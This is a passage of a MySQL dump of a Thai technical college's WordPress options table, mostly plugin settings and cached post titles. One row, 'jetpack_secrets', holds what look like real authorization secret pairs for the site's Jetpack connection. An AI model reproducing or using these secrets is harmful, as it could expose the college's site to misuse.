page\";s:14:\"post_permalink\";s:31:\"http://www.technicrayong.ac.th/\";s:5:\"views\";s:1:\"2\";}i:3;a:4:{s:7:\"post_id\";s:3:\"982\";s:10:\"post_title\";s:63:\"คณะผู้บริหารวิทยาลัยฯ\";s:14:\"post_permalink\";s:221:\"http://www.technicrayong.ac.th/%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b8%af/\";s:5:\"views\";s:1:\"2\";}i:4;a:4:{s:7:\"post_id\";s:4:\"1512\";s:10:\"post_title\";s:54:\"งานบริหารงานทั่วไป\";s:14:\"post_permalink\";s:194:\"http://www.technicrayong.ac.th/%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%97%e0%b8%b1%e0%b9%88%e0%b8%a7%e0%b9%84%e0%b8%9b/\";s:5:\"views\";s:1:\"2\";}i:5;a:4:{s:7:\"post_id\";s:4:\"1174\";s:10:\"post_title\";s:55:\"ตารางเรียน-ตารางสอน\";s:14:\"post_permalink\";s:131:\"http://www.technicrayong.ac.th/%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%aa%e0%b8%ad%e0%b8%99%e0%b8%84%e0%b8%a3%e0%b8%b9/\";s:5:\"views\";s:1:\"1\";}i:6;a:4:{s:7:\"post_id\";s:4:\"3200\";s:10:\"post_title\";s:27:\"ปิโตรเคมี\";s:14:\"post_permalink\";s:113:\"http://www.technicrayong.ac.th/%e0%b8%9b%e0%b8%b4%e0%b9%82%e0%b8%95%e0%b8%a3%e0%b9%80%e0%b8%84%e0%b8%a1%e0%b8%b5/\";s:5:\"views\";s:1:\"1\";}i:7;a:4:{s:7:\"post_id\";s:4:\"4166\";s:10:\"post_title\";s:1569:\"วิทยาลัยเทคนิคระยอง ร่วมกับ บริษัท มิซูบิชิ อีเล็คทริค แฟคตอรี่ ออโตเมชั่น (ประเทศไทย) จำกัด จัดโครงการอบรมใช้โปรแกรม GX Work3 ให้แก่ ครู นักเรียน นักศึกษา ระหว่างวันที่ 24-26 ตุลาคม 2561 ซึ่งเป็นโครงการที่ดีของสถาบันการอาชีวศึกษาภาคตะวันออก ที่ช่วยส่งเสริม พัฒนาบุคลากรในพื้นที่ระเบียงเศรษฐกิจภาคตะวันออก EEC เพื่อรองรับอุตสาหกรรมที่ใช้ระบบอัตโนมัติในอุตสาหกรรม 4.0 และเตรียมความพร้อมในการแข่งขันทักษะวิชาชีพ ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ในวันพุธที่ 24 ตุลาคม 2561 ณ ศูนย์การเรียนรู้และปฏิบัติระบบอัตโนมัติ อาคารวิจัยและพัฒนาการอาชีวศึกษา วิทยาลัยเทคนิคระยอง\";s:14:\"post_permalink\";s:224:\"http://www.technicrayong.ac.th/%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b8%a3%e0%b9%88-4/\";s:5:\"views\";s:1:\"1\";}}}s:32:\"fa01794928337c3481e7434b981787e1\";a:1:{i:1575949507;a:0:{}}}', 'yes'),
(2917, 'feedback_unread_count', '0', 'yes'),
(2920, 'widget_blog-stats', 'a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}', 'yes'),
(2923, 'widget_widget_contact_info', 'a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}', 'yes'),
(2924, 'widget_top-posts', 'a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}', 'yes'),
(2925, 'verification_services_codes', '0', 'yes'),
(2927, 'open_graph_protocol_site_type', '', 'yes'),
(2928, 'facebook_admins', 'a:0:{}', 'yes');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(2929, 'disabled_likes', '0', 'yes'),
(2931, 'jetpack-twitter-cards-site-tag', '', 'yes'),
(2982, 'carousel_display_exif', '1', 'yes'),
(2984, 'carousel_display_geo', '1', 'yes'),
(2985, 'carousel_background_color', '', 'yes'),
(3543, 'pdfviewer_version', '0.1', 'yes'),
(3985, 'wp_mobile_app_promos', '1', 'yes'),
(4034, 'wp_mobile_disable', '0', 'yes'),
(4035, 'theme_mods_pub/minileven', 'a:1:{s:18:\"custom_css_post_id\";i:-1;}', 'yes'),
(4045, 'wp_mobile_excerpt', '1', 'yes'),
(4054, 'wp_mobile_featured_images', '1', 'yes'),
(4312, 'jetpack_protect_blocked_attempts', '168906', 'no'),
(5165, 'post_by_email_address2', 'NULL', 'yes'),
(5375, 'fvwpflowplayer', 'a:77:{s:8:\"autoplay\";s:5:\"false\";s:15:\"googleanalytics\";s:5:\"false\";s:3:\"key\";s:5:\"false\";s:4:\"logo\";s:5:\"false\";s:4:\"rtmp\";s:5:\"false\";s:14:\"auto_buffering\";s:5:\"false\";s:7:\"scaling\";s:4:\"true\";s:16:\"disableembedding\";s:5:\"false\";s:14:\"disablesharing\";s:5:\"false\";s:24:\"disable_video_hash_links\";b:0;s:8:\"popupbox\";s:5:\"false\";s:15:\"allowfullscreen\";s:4:\"true\";s:12:\"allowuploads\";s:4:\"true\";s:13:\"postthumbnail\";s:5:\"false\";s:3:\"tgt\";s:15:\"backgroundcolor\";s:15:\"backgroundColor\";s:7:\"#333333\";s:6:\"canvas\";s:7:\"#000000\";s:11:\"sliderColor\";s:7:\"#ffffff\";s:13:\"durationColor\";s:7:\"#eeeeee\";s:9:\"timeColor\";s:7:\"#eeeeee\";s:13:\"progressColor\";s:7:\"#bb0000\";s:11:\"bufferColor\";s:7:\"#eeeeee\";s:13:\"timelineColor\";s:7:\"#666666\";s:11:\"borderColor\";s:7:\"#666666\";s:9:\"hasBorder\";s:5:\"false\";s:11:\"adTextColor\";s:4:\"#888\";s:12:\"adLinksColor\";s:7:\"#ff3333\";s:15:\"subtitleBgColor\";s:7:\"#000000\";s:15:\"subtitleBgAlpha\";d:0.5;s:12:\"subtitleSize\";i:16;s:15:\"playlistBgColor\";s:7:\"#808080\";s:17:\"playlistFontColor\";s:0:\"\";s:21:\"playlistSelectedColor\";s:7:\"#bb0000\";s:12:\"logoPosition\";s:11:\"bottom-left\";s:12:\"parse_commas\";s:5:\"false\";s:5:\"width\";s:3:\"640\";s:6:\"height\";s:3:\"360\";s:6:\"engine\";s:5:\"false\";s:9:\"font-face\";s:26:\"Tahoma, Geneva, sans-serif\";s:2:\"ad\";s:0:\"\";s:8:\"ad_width\";s:0:\"\";s:9:\"ad_height\";s:0:\"\";s:6:\"ad_css\";s:160:\".wpfp_custom_ad { position: absolute; bottom: 10%; z-index: 20; width: 100%; }\n.wpfp_custom_ad_content { background: white; margin: 0 auto; position: relative }\";s:13:\"ad_show_after\";i:0;s:20:\"disable_videochecker\";s:5:\"false\";s:9:\"interface\";a:11:{s:8:\"playlist\";b:0;s:8:\"redirect\";b:0;s:8:\"autoplay\";b:0;s:4:\"loop\";b:0;s:9:\"splashend\";b:0;s:5:\"embed\";b:0;s:9:\"subtitles\";b:0;s:3:\"ads\";b:0;s:6:\"mobile\";b:0;s:5:\"align\";b:0;s:5:\"popup\";s:4:\"true\";}s:13:\"amazon_bucket\";a:1:{i:0;s:0:\"\";}s:10:\"amazon_key\";a:1:{i:0;s:0:\"\";}s:13:\"amazon_secret\";a:1:{i:0;s:0:\"\";}s:13:\"amazon_region\";a:1:{i:0;s:0:\"\";}s:13:\"amazon_expire\";s:1:\"5\";s:19:\"amazon_expire_force\";s:5:\"false\";s:10:\"fixed_size\";s:5:\"false\";s:13:\"js-everywhere\";s:5:\"false\";s:12:\"marginBottom\";s:2:\"28\";s:14:\"ui_play_button\";s:4:\"true\";s:6:\"volume\";s:3:\"0.7\";s:15:\"player-position\";s:0:\"\";s:16:\"playlist_advance\";s:0:\"\";s:18:\"sharing_email_text\";s:32:\"Check out the amazing video here\";s:9:\"liststyle\";s:10:\"horizontal\";s:18:\"ui_speed_increment\";d:0.25;s:14:\"popups_default\";s:2:\"no\";s:11:\"email_lists\";a:0:{}s:12:\"sticky_video\";s:5:\"false\";s:12:\"sticky_place\";s:12:\"right-bottom\";s:12:\"sticky_width\";s:3:\"380\";s:15:\"playlist-design\";s:4:\"2017\";s:15:\"lightbox_images\";b:0;s:26:\"lightbox_improve_galleries\";b:0;s:13:\"mailchimp_api\";s:0:\"\";s:14:\"mailchimp_list\";s:0:\"\";s:15:\"mailchimp_label\";s:21:\"Subscribe for updates\";s:7:\"version\";s:8:\"6.3.11.1\";s:52:\"css_writeout-http-www-technicrayong-ac-th-wp-content\";s:10:\"1515323737\";s:24:\"notification_video_links\";s:4:\"true\";s:23:\"video_checker_agreement\";s:4:\"true\";}', 'yes'),
(5381, 'widget_widget_fvplayer', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(5382, 'fv_player_email_lists', 'a:1:{i:1;a:6:{s:10:\"first_name\";b:1;s:9:\"last_name\";b:0;s:11:\"integration\";b:0;s:5:\"title\";s:21:\"Subscribe to list one\";s:11:\"description\";s:39:\"Two good reasons to subscribe right now\";s:8:\"disabled\";b:0;}}', 'yes'),
(5387, 'fv_player_mailchimp_lists', 'a:0:{}', 'yes'),
(5425, 'fv_flowplayer_checker_queue', 'a:0:{}', 'yes'),
(5560, 'wdsvp_do_activation_set_up_redirect', '0', 'yes'),
(5568, 'wdsvp_admin_notice', 'a:1:{s:15:\"two_week_review\";a:2:{s:5:\"start\";s:9:\"1/21/2018\";s:3:\"int\";i:14;}}', 'yes'),
(5578, 'wdsvp_subscribe_done', '1', 'yes'),
(6094, 'videojs_options', 'a:11:{s:14:\"videojs_height\";s:3:\"360\";s:13:\"videojs_width\";s:3:\"640\";s:15:\"videojs_preload\";N;s:16:\"videojs_autoplay\";s:2:\"on\";s:18:\"videojs_responsive\";s:2:\"on\";s:11:\"videojs_cdn\";s:2:\"on\";s:17:\"videojs_color_one\";s:4:\"#ccc\";s:17:\"videojs_color_two\";s:7:\"#66A8CC\";s:19:\"videojs_color_three\";s:4:\"#000\";s:13:\"videojs_reset\";N;s:23:\"videojs_video_shortcode\";s:2:\"on\";}', 'yes'),
(6095, 'videojs_db_version', '1.0', 'yes'),
(8664, 'post_by_email_address3', 'NULL', 'yes'),
(10569, 'subscription_options', 'a:2:{s:10:\"invitation\";s:226:\"Howdy.\r\n\r\nYou recently followed this blog\'s posts. This means you will receive each new post by email.\r\n\r\nTo activate, click confirm below. If you believe this is an error, ignore this message and we\'ll never bother you again.\";s:14:\"comment_follow\";s:239:\"Howdy.\r\n\r\nYou recently followed one of my posts. This means you will receive an email when new comments are posted.\r\n\r\nTo activate, click confirm below. If you believe this is an error, ignore this message and we\'ll never bother you again.\";}', 'yes'),
(10573, 'jetpack_relatedposts', 'a:8:{s:7:\"enabled\";b:1;s:13:\"show_headline\";b:1;s:15:\"show_thumbnails\";b:0;s:9:\"show_date\";b:1;s:12:\"show_context\";b:1;s:6:\"layout\";s:4:\"grid\";s:8:\"headline\";s:7:\"Related\";s:4:\"size\";N;}', 'yes'),
(12531, 'widget_metaslider_widget', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(12536, 'ms_hide_all_ads_until', '1524621678', 'yes'),
(12537, 'metaslider_systemcheck', 'a:2:{s:16:\"wordPressVersion\";b:0;s:12:\"imageLibrary\";b:0;}', 'no'),
(12612, 'metaslider_tour_cancelled_on', 'step_view_shortcode', 'yes'),
(12844, '_transient_cta_previous_version', '3.3.6', 'yes'),
(12845, '_transient_cta_current_version', '3.3.6', 'yes'),
(12846, 'wp_cta_global_record_admin_actions', '1', 'no'),
(12847, 'wp_cta_global_wp_cta_slug', 'cta', 'no'),
(12848, 'wp_cta_activate_rewrite_check', '0', 'yes'),
(12853, 'cta_completed_upgrade_routines', 'a:2:{i:0;s:24:\"create_variation_objects\";i:1;s:15:\"default_content\";}', 'yes'),
(12861, 'widget_id_wp_cta_static_widget', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(12862, 'widget_id_wp_cta_dynamic_widget', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(12865, 'inbound-pro', '{\"settings\":{\"mailer\":[]}}', 'no'),
(12866, 'inbound_shared_version', '2.0.2', 'no'),
(12869, 'wplead_list_category_children', 'a:1:{i:9;a:1:{i:0;i:10;}}', 'yes'),
(12871, 'list-double-optin-list-id', '10', 'yes'),
(12874, 'list-double-optin-page-id', '623', 'yes'),
(13309, 'n2_ss3_version', '3.2.12', 'yes'),
(13316, 'widget_smartslider3', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(13630, 'mtsnb_stats', 'a:0:{}', 'yes'),
(13951, 'MBFREE_CREATED', '1516089097', 'yes'),
(13952, 'MBFREE_HOMEURL', 'http://www.technicrayong.ac.th', 'yes'),
(13960, 'maxbuttons_user_level', 'manage_options', 'yes'),
(14201, 'ml-slider_children', 'a:0:{}', 'yes'),
(14320, 'su_option_custom-formatting', 'on', 'no'),
(14321, 'su_option_skip', 'on', 'no'),
(14322, 'su_option_prefix', 'su_', 'no'),
(14323, 'su_option_custom-css', '', 'no'),
(14329, 'widget_shortcodes-ultimate', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(14330, 'su_option_version', '5.0.2', 'no'),
(14333, 'su_option_dismissed_notices', 'a:1:{s:4:\"rate\";i:1516696138;}', 'yes'),
(14429, 'widget_cta', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(15213, 'wpcom_publish_posts_with_markdown', '1', 'yes'),
(15371, 'jetpack_sync_settings_disable', '0', 'yes'),
(15385, 'jetpack_constants_sync_checksum', 'a:19:{s:16:\"EMPTY_TRASH_DAYS\";i:2473281379;s:17:\"WP_POST_REVISIONS\";i:4261170317;s:26:\"AUTOMATIC_UPDATER_DISABLED\";i:634125391;s:7:\"ABSPATH\";i:1887743835;s:14:\"WP_CONTENT_DIR\";i:3822075273;s:9:\"FS_METHOD\";i:634125391;s:18:\"DISALLOW_FILE_EDIT\";i:634125391;s:18:\"DISALLOW_FILE_MODS\";i:634125391;s:19:\"WP_AUTO_UPDATE_CORE\";i:634125391;s:22:\"WP_HTTP_BLOCK_EXTERNAL\";i:634125391;s:19:\"WP_ACCESSIBLE_HOSTS\";i:634125391;s:16:\"JETPACK__VERSION\";i:84779734;s:12:\"IS_PRESSABLE\";i:634125391;s:15:\"DISABLE_WP_CRON\";i:634125391;s:17:\"ALTERNATE_WP_CRON\";i:634125391;s:20:\"WP_CRON_LOCK_TIMEOUT\";i:3994858278;s:11:\"PHP_VERSION\";i:1139520266;s:15:\"WP_MEMORY_LIMIT\";i:3065409971;s:19:\"WP_MAX_MEMORY_LIMIT\";i:1474498405;}', 'yes'),
(15388, 'jetpack_sync_https_history_main_network_site_url', 'a:5:{i:0;s:4:\"http\";i:1;s:4:\"http\";i:2;s:4:\"http\";i:3;s:4:\"http\";i:4;s:4:\"http\";}', 'yes'),
(15389, 'jetpack_sync_https_history_site_url', 'a:5:{i:0;s:4:\"http\";i:1;s:4:\"http\";i:2;s:4:\"http\";i:3;s:4:\"http\";i:4;s:4:\"http\";}', 'yes'),
(15390, 'jetpack_sync_https_history_home_url', 'a:5:{i:0;s:4:\"http\";i:1;s:4:\"http\";i:2;s:4:\"http\";i:3;s:4:\"http\";i:4;s:4:\"http\";}', 'yes'),
(15420, 'jetpack_callables_sync_checksum', 'a:30:{s:18:\"wp_max_upload_size\";i:869269328;s:15:\"is_main_network\";i:734881840;s:13:\"is_multi_site\";i:734881840;s:17:\"main_network_site\";i:2641451300;s:8:\"site_url\";i:2641451300;s:8:\"home_url\";i:2641451300;s:16:\"single_user_site\";i:734881840;s:7:\"updates\";i:2353333226;s:28:\"has_file_system_write_access\";i:4261170317;s:21:\"is_version_controlled\";i:734881840;s:10:\"taxonomies\";i:1954393493;s:10:\"post_types\";i:2265626061;s:18:\"post_type_features\";i:2762701743;s:10:\"shortcodes\";i:3279613233;s:27:\"rest_api_allowed_post_types\";i:696315151;s:32:\"rest_api_allowed_public_metadata\";i:223132457;s:24:\"sso_is_two_step_required\";i:734881840;s:26:\"sso_should_hide_login_form\";i:734881840;s:18:\"sso_match_by_email\";i:4261170317;s:21:\"sso_new_user_override\";i:734881840;s:29:\"sso_bypass_default_login_form\";i:734881840;s:10:\"wp_version\";i:1319028621;s:11:\"get_plugins\";i:4236602338;s:24:\"get_plugins_action_links\";i:3261346802;s:14:\"active_modules\";i:153840550;s:16:\"hosting_provider\";i:769900095;s:6:\"locale\";i:110763218;s:13:\"site_icon_url\";i:734881840;s:5:\"roles\";i:1492912916;s:8:\"timezone\";i:2889922694;}', 'no'),
(15423, 'jetpack_next_sync_time_sync', '1575949472', 'yes'),
(15424, 'jetpack_next_sync_time_full-sync-enqueue', '1575949628', 'yes'),
(15430, 'jetpack_secrets', 'a:7:{s:19:\"jetpack_authorize_1\";a:3:{s:8:\"secret_1\";s:32:\"YBZv5Ip2NRb7l2JFTCepc0LUrbtDEudg\";s:8:\"secret_2\";s:32:\"eYkGvWtlKtuRtgDP3bx9XoqLQsKS8wbD\";s:3:\"exp\";i:1516372143;}s:19:\"jetpack_authorize_3\";a:3:{s:8:\"secret_1\";s:32:\"9TawqmRdjHZQLFTFgllYFIg6io1pYF0q\";s:8:\"secret_2\";s:32:\"IfoyqA7I9foEZFGjqPH0NSYDXnmckonR\";s:3:\"exp\";i:1554285505;}s:19:\"jetpack_authorize_4\";a:3:{s:8:\"secret_1\";s:32:\"1N2G9S7TCXFD6zvfHdyYjJB4g0WtsMMq\";s:8:\"secret_2\";s:32:\"qsXiAjV0YsBe8XKybdnH8HQ0v9ksXra3\";s:3:\"exp\";i:1525656800;}s:19:\"jetpack_authorize_2\";a:3:{s:8:\"secret_1\";s:32:\"xWGvZYe0nWPl0Rh9BitECoyfHjQZYYE1\";s:8:\"secret_2\";s:32:\"GXHpocwtcxDFm9GUGQlDQUlNqfWtJENM\";s:3:\"exp\";i:1534231398;}s:20:\"jetpack_authorize_12\";a:3:{s:8:\"secret_1\";s:32:\"4NgI4bXURA8t3o9uIzuPDFTJbmHQ2iqd\";s:8:\"secret_2\";s:32:\"V8k3nBETN408rnt16NyihJ3Ku0xNFPRh\";s:3:\"exp\";i:1560401270;}s:20:\"jetpack_authorize_14\";a:3:{s:8:\"secret_1\";s:32:\"g1rUx33xPHkKkUgIAH6fOUOwbWCeSnY9\";s:8:\"secret_2\";s:32:\"wUldkvoWRpFjulR8r0PXB5W2o1GjpofB\";s:3:\"exp\";i:1568872556;}s:20:\"jetpack_authorize_13\";a:3:{s:8:\"secret_1\";s:32:\"gYLjyXvM9wbxRMc4bAO5JoL768p403hW\";s:8:\"secret_2\";s:32:\"QkS6ePJ36TEN9tPxKYewgBMVWjScsj5M\";s:3:\"exp\";i:1559308630;}}', 'no'),
(15431, 'jetpack_sync_settings_max_queue_size', '1000', 'yes'),
(15432, 'jetpack_sync_settings_max_queue_lag', '900', 'yes'),
(15440, 'jetpack_sync_settings_dequeue_max_bytes', '500000', 'yes'),
(15441, 'jetpack_sync_settings_upload_max_bytes', '600000', 'yes'),
(15442, 'jetpack_sync_settings_upload_max_rows', '500', 'yes'),
(15443, 'jetpack_sync_settings_sync_wait_time', '10', 'yes'),
(15444, 'jetpack_sync_settings_sync_wait_threshold', '5', 'yes'),
(15445, 'jetpack_sync_settings_enqueue_wait_time', '10', 'yes'),
(15446, 'jetpack_sync_settings_queue_max_writes_sec', '100', 'yes'),
(15447, 'jetpack_sync_settings_post_types_blacklist', 'a:0:{}', 'yes'),
(15448, 'jetpack_sync_settings_render_filtered_content', '0', 'yes'),
(15449, 'jetpack_sync_settings_post_meta_whitelist', 'a:0:{}', 'yes'),
(15450, 'jetpack_sync_settings_comment_meta_whitelist', 'a:0:{}', 'yes'),
(15451, 'jetpack_sync_settings_max_enqueue_full_sync', '100', 'yes'),
(15452, 'jetpack_sync_settings_max_queue_size_full_sync', '1000', 'yes'),
(15453, 'jetpack_sync_settings_sync_via_cron', '1', 'yes'),
(15454, 'jetpack_sync_settings_cron_sync_time_limit', '30', 'yes'),
(15506, 'jetpack_protect_activating', 'activating', 'no'),
(15534, 'jetpack_next_sync_time_full_sync', '1574498907', 'yes'),
(15668, 'jetpack_last_connect_url_check', '1568865355', 'no'),
(15999, 'jetpack_updates_sync_checksum', 'a:3:{s:11:\"update_core\";i:797522231;s:14:\"update_plugins\";i:3219707085;s:13:\"update_themes\";i:785029981;}', 'yes'),
(16137, 'w3tc_nr_application_id', '{\"d41d8cd98f00b204e9800998ecf8427e\":0}', 'yes'),
(16138, 'w3tc_state', '{\"common.install\":1516185465,\"common.next_support_us_invitation\":1569998870,\"common.support_us_invitations\":5}', 'no'),
(16141, 'w3tc_generic_widgetservices', '{\"items\":[{\"name\":\"Premium Support Response (Usually <1h First Response)\",\"parameter_name\":\"field4\",\"parameter_value\":\"Premium Support Response (Usually <1h First Response)\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"Performance Audit \\/ Consult (Theme, Plugin, Content, Server)\",\"parameter_name\":\"field4\",\"parameter_value\":\"Performance Audit \\/ Consult (Theme, Plugin, Content, Server)\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"Plugin Configuration\",\"parameter_name\":\"field4\",\"parameter_value\":\"Plugin Configuration\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"SSL Performance Setup\",\"parameter_name\":\"field4\",\"parameter_value\":\"SSL Performance Setup\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"Full Site Delivery Setup\",\"parameter_name\":\"field4\",\"parameter_value\":\"Full Site Delivery Setup\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"Hosting Environment Troubleshooting\",\"parameter_name\":\"field4\",\"parameter_value\":\"Hosting Environment Troubleshooting\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"Performance Monitoring\",\"parameter_name\":\"field4\",\"parameter_value\":\"Performance Monitoring\",\"form_hash\":\"m5pom8z0qy59rm\"}],\"expires\":1568011671}', 'no'),
(19293, 'wp_automatic_version', '18', 'yes'),
(19304, 'wp_automatic_version_updated', '1516352254', 'yes'),
(19305, 'wp_automatic_version_last', '3.34.0\n', 'yes'),
(19377, 'gm_last_processed', '699', 'yes'),
(20156, 'polylang', 'a:15:{s:7:\"browser\";b:0;s:7:\"rewrite\";i:1;s:12:\"hide_default\";i:1;s:10:\"force_lang\";i:1;s:13:\"redirect_lang\";i:0;s:13:\"media_support\";i:1;s:9:\"uninstall\";i:0;s:4:\"sync\";a:0:{}s:10:\"post_types\";a:0:{}s:10:\"taxonomies\";a:0:{}s:7:\"domains\";a:0:{}s:7:\"version\";s:6:\"2.3.10\";s:12:\"default_lang\";s:2:\"th\";s:9:\"nav_menus\";a:1:{s:18:\"university-hub-pro\";a:5:{s:7:\"primary\";a:2:{s:2:\"th\";i:2;s:2:\"en\";i:68;}s:3:\"top\";a:2:{s:2:\"th\";i:29;s:2:\"en\";i:29;}s:6:\"footer\";a:2:{s:2:\"th\";i:0;s:2:\"en\";i:0;}s:6:\"social\";a:2:{s:2:\"th\";i:0;s:2:\"en\";i:0;}s:8:\"notfound\";a:2:{s:2:\"th\";i:0;s:2:\"en\";i:0;}}}s:16:\"previous_version\";s:5:\"2.3.4\";}', 'yes'),
(20157, 'polylang_wpml_strings', 'a:0:{}', 'yes'),
(20166, 'widget_polylang', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(23425, 'cpto_options', 'a:7:{s:23:\"show_reorder_interfaces\";a:4:{s:4:\"post\";s:4:\"show\";s:10:\"attachment\";s:4:\"show\";s:14:\"e_org_chart_ps\";s:4:\"show\";s:8:\"feedback\";s:4:\"show\";}s:8:\"autosort\";i:1;s:9:\"adminsort\";i:1;s:18:\"use_query_ASC_DESC\";s:0:\"\";s:17:\"archive_drag_drop\";i:1;s:10:\"capability\";s:14:\"manage_options\";s:21:\"navigation_sort_apply\";i:1;}', 'yes'),
(23426, 'CPT_configured', 'TRUE', 'yes'),
(29346, 'ms_ads_first_seen_on', '1517216621', 'yes'),
(32732, '_transient_awesplash_custom_font_url', '', 'yes'),
(32733, '_transient_awesplash_custom_css', '.hero-section--color .hero-section__option {background-color: #1e73be;}', 'yes'),
(33176, 'widget_optin-monster-api', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(33179, '_amn_om_last_checked', '1517270400', 'yes'),
(33182, 'optin_monster_viewed_welcome', '1', 'yes'),
(33255, 'responsive_lightbox_settings', 'a:21:{s:6:\"script\";s:8:\"swipebox\";s:8:\"selector\";s:8:\"lightbox\";s:9:\"galleries\";b:1;s:18:\"gallery_image_size\";s:4:\"full\";s:19:\"gallery_image_title\";s:7:\"default\";s:20:\"force_custom_gallery\";b:0;s:28:\"woocommerce_gallery_lightbox\";b:0;s:6:\"videos\";b:1;s:7:\"widgets\";b:0;s:8:\"comments\";b:0;s:11:\"image_links\";b:1;s:11:\"image_title\";s:7:\"default\";s:17:\"images_as_gallery\";b:0;s:19:\"deactivation_delete\";b:0;s:13:\"loading_place\";s:6:\"header\";s:19:\"conditional_loading\";b:0;s:20:\"enable_custom_events\";b:0;s:13:\"custom_events\";s:12:\"ajaxComplete\";s:14:\"update_version\";i:2;s:13:\"update_notice\";b:1;s:17:\"update_delay_date\";s:0:\"\";}', 'no'),
(33256, 'responsive_lightbox_configuration', 'a:7:{s:8:\"swipebox\";a:8:{s:9:\"animation\";s:3:\"css\";s:15:\"force_png_icons\";b:0;s:17:\"hide_close_mobile\";b:0;s:18:\"remove_bars_mobile\";b:0;s:9:\"hide_bars\";b:1;s:15:\"hide_bars_delay\";i:5000;s:15:\"video_max_width\";i:1080;s:11:\"loop_at_end\";b:0;}s:11:\"prettyphoto\";a:21:{s:15:\"animation_speed\";s:6:\"normal\";s:9:\"slideshow\";b:0;s:15:\"slideshow_delay\";i:5000;s:18:\"slideshow_autoplay\";b:0;s:7:\"opacity\";i:75;s:10:\"show_title\";b:1;s:12:\"allow_resize\";b:1;s:12:\"allow_expand\";b:1;s:5:\"width\";i:1080;s:6:\"height\";i:720;s:9:\"separator\";s:1:\"/\";s:5:\"theme\";s:10:\"pp_default\";s:18:\"horizontal_padding\";i:20;s:10:\"hide_flash\";b:0;s:5:\"wmode\";s:6:\"opaque\";s:14:\"video_autoplay\";b:0;s:5:\"modal\";b:0;s:11:\"deeplinking\";b:0;s:15:\"overlay_gallery\";b:1;s:18:\"keyboard_shortcuts\";b:1;s:6:\"social\";b:0;}s:8:\"fancybox\";a:25:{s:5:\"modal\";b:0;s:12:\"show_overlay\";b:1;s:17:\"show_close_button\";b:1;s:20:\"enable_escape_button\";b:1;s:21:\"hide_on_overlay_click\";b:1;s:21:\"hide_on_content_click\";b:0;s:6:\"cyclic\";b:0;s:15:\"show_nav_arrows\";b:1;s:10:\"auto_scale\";b:1;s:9:\"scrolling\";s:3:\"yes\";s:16:\"center_on_scroll\";b:1;s:7:\"opacity\";b:1;s:15:\"overlay_opacity\";i:70;s:13:\"overlay_color\";s:4:\"#666\";s:10:\"title_show\";b:1;s:14:\"title_position\";s:7:\"outside\";s:11:\"transitions\";s:4:\"fade\";s:7:\"easings\";s:5:\"swing\";s:6:\"speeds\";i:300;s:12:\"change_speed\";i:300;s:11:\"change_fade\";i:100;s:7:\"padding\";i:5;s:6:\"margin\";i:5;s:11:\"video_width\";i:1080;s:12:\"video_height\";i:720;}s:4:\"nivo\";a:4:{s:6:\"effect\";s:4:\"fade\";s:22:\"click_overlay_to_close\";b:1;s:12:\"keyboard_nav\";b:1;s:13:\"error_message\";s:63:\"The requested content cannot be loaded. Please try again later.\";}s:13:\"imagelightbox\";a:6:{s:15:\"animation_speed\";i:250;s:12:\"preload_next\";b:1;s:15:\"enable_keyboard\";b:1;s:11:\"quit_on_end\";b:0;s:19:\"quit_on_image_click\";b:0;s:22:\"quit_on_document_click\";b:1;}s:6:\"tosrus\";a:9:{s:6:\"effect\";s:5:\"slide\";s:8:\"infinite\";b:1;s:4:\"keys\";b:0;s:8:\"autoplay\";b:1;s:14:\"pause_on_hover\";b:0;s:7:\"timeout\";i:4000;s:10:\"pagination\";b:1;s:15:\"pagination_type\";s:10:\"thumbnails\";s:14:\"close_on_click\";b:0;}s:12:\"featherlight\";a:6:{s:10:\"open_speed\";i:250;s:11:\"close_speed\";i:250;s:14:\"close_on_click\";s:10:\"background\";s:12:\"close_on_esc\";b:1;s:15:\"gallery_fade_in\";i:100;s:16:\"gallery_fade_out\";i:300;}}', 'no'),
(33257, 'responsive_lightbox_version', '1.7.2', 'no'),
(33263, 'widget_responsive_lightbox_gallery_widget', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(33264, 'widget_responsive_lightbox_image_widget', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(33265, 'responsive_lightbox_activation_date', '1517309733', 'yes'),
